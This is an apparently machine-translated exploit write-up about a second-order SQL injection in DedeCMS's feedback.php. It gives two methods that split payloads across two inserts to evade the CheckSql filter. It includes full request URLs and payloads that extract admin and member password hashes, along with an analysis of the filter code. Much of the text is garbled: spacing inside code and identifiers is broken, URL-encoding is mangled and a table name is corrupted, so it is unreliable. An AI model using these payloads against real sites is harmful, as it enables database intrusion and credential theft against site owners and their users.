Dedecms second injection classic exp Structure

0x01 PrefaceLong long ago, yy@safekeyer.com found that dedecms second injection of a classic code audit in the secondary attack case, but limited to the field size cannot exceed 60 bytes and appear relatively chicken, under the collective wisdom of safekeyer, we found two ways to break through. This article focuses on the exp structure, such as detailed vulnerability analysis, please see: http://www.wooyun.org/bugs/wooyun-2010-0185620x02 Method 1: Direct shorteningTheory: insert --> select --> insert --> select Exp: (red indicates key data) First insert http://www.bkjia.com /Dede/plus/feedback. php? Action = send & comtype = comments & aid = 1 & isconfirm = yes & cmtuser = admin & msg = asfsafsdaf & face = 6 & validate = slep & title = 1 ', "'", 8, (select pwd from % 23 @__ admin )) % 23 & sbbt = % E5 % 8F % 91% E9 % 80% 81% E8 % AF % 84% E8 % AE % BA Second insert http://127.0.0.1/dede/plus/feedback.php ? Action = send & comtype = reply & fid = 27 & isconfirm = yes & cmtuser = admin & msg = asfsafsdaf & face = 6 & validate = angr & title = 1 & sbbt = % E5 % 8F % 91% E9 % 80% 81% E8 % AF % 84% E8 % AE % BA shows that the first insert payload is: 1', "'", 8, (select pwd from % 23 @__ admin) % 23 Database: returned result: bypassing specific code analysis: 01 function CheckSql ($ db_string, $ querytype = 'select') 02 {03 · (omitted here) 04 while (TRUE) 05 {06 $ pos = strpos ($ db_string, '\ '', $ pos + 1); 07 if ($ Pos = FALSE) 08 {09 break; 10} 11 $ clean. = substr ($ db_string, $ old_pos, $ pos-$ old_pos); 12 while (TRUE) 13 {14 $ pos1 = strpos ($ db_string ,'\'', $ pos + 1); 15 $ pos2 = strpos ($ db_string, '\', $ pos + 1); 16 if ($ pos1 = FALSE) 17 {18 break; 19} 20 elseif ($ pos2 = FALSE | $ pos2> $ pos1) 21 {22 $ pos = $ pos1; 23 break; 24} 25 $ pos = $ pos2 + 1; 26} 27 $ clean. = '$ s $'; 28 $ old_pos = $ p OS + 1; 29} 30 $ clean. = substr ($ db_string, $ old_pos); 31 // echo $ clean; exit (); 32 $ clean = trim (strtolower (preg_replace (array ('~ \ S ++ ~ S '), array (''), $ clean); 33 · (omitted here) 34} The above detection code is used to replace the SQL statement with the content between the two quotation marks $ s $ for the second insert: INSERT INTO 'dede _ feedback' ('aid ', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype ', 'face', 'msg ') VALUES ('1', '0', 'test', '1', "'", 8, (select pwd from dede_admin) # ',' 127. 0.0.1 ', '1', '000000', '2', '0', '0', 'feedback', '6', 'asfsafsdaf: insert into 'dede _ feed Back '('aid', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad ', 'Good', 'ftype', 'face', 'msg ') VALUES ($ s $, $ s $, "$ s $, $ s $, $ s $) then function CheckSql ($ db_string, $ querytype = 'select') has to detect bypassing. The focus is on the processing of single quotes. Single quotes are enclosed in single quotes. Single quotes are used as strings. Single quotes play an important role in bypassing the injection detection, and make it unable to play single quotes in the complete insert operation, only as a string.0x03 Method 2: Two inserts are validTheory: insert --> select --> insert --> select Exp: (red indicates key data) First insert http://127.0.0.1/dede/plus/feedback.php ? Action = send & comtype = comments & aid = 1 & isconfirm = yes & cmtuser = admin & msg = asfsafsdaf & face = 6 & validate = slep & title = 1 ', (char (@ '''),/* & sbbt = % E5 % 8F % 91% E9 % 80% 81% E8 % AF % 84% E8 % AE % BA Second insert http://127.0.0.1/dede/plus/feedback.php ? Aid = 1 & action = send & comtype = reply & fid = 48 & isconfirm = yes & validate = craf & msg = */1, 2, 4, 5, 6, 7, (select/**/concat (userid, 0x3a, pwd)/**/from/**/dede_member/**/limit/**/1 )) % 23 insert different parts of payload into the database through two insert operations, and then combine them into a complete payload. The first insert: 1', (char (@''')), /* Second insert: */1, 2, 3, 4, 5, 6, 7, (select/**/concat (userid, 0x3a, pwd) /**/from/**/dede_member/**/limit/**/1) % 23: insert into 'dede _ feedback' ('aid ', 'typeid', 'U Sername', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype', 'face ', 'msg ') VALUES ('1', '0', 'test', '1', (char (@ ''''),/*', '127. 0.0.1 ', '1', '000000', '2', '0', '0', 'feedback', '0 ','@'\''*/, 2, 3, 4, 5, 6, 7, 8, (selectconcat (userid, 0x7c, pwd) fromde_admin) ') after anti-injection function processing: insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype ', 'face', 'msg ') valu Es ($ s $, $ s $, (char (@ '$ s $, $ s $, $ s $, $ s $. Database: returned results:0x03 conclusionIf you have any errors, you may wish to correct them. If you have any suggestions, you may wish to discuss them.